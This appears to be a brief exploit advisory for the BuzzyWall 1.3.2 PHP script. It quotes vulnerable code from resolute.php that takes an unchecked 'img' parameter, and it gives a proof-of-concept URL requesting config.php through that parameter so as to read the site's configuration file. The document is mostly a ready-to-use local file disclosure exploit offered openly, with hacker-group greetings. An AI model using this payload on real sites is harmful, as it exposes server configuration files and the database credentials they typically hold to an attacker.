[~] BuzzyWall 1.3.2 (resolute.php) Local File Disclosure Exploit
[~] Found by cr4wl3r @hackb0x
[~] d0rk: no d0rk f0r kiddi0ts
[~] Script: http://sourceforge.net/projects/buzzywall/files/buzzywall/

err0r c0de resolute.php

<?PHP
header ("Content-type: image/jpeg");

$img = $_GET['img'];
header('Content-Disposition: attachment; filename="'.$img.'"');
$percent = $_GET['percent'];
$constrain = $_GET['constrain'];
$w = $_GET['w'];
$h = $_GET['h'];

....

[~] p0c: http://target/resolute.php?img=config.php

thx: valentin, xoron, irvian, cyberlog, EA ngel, Minato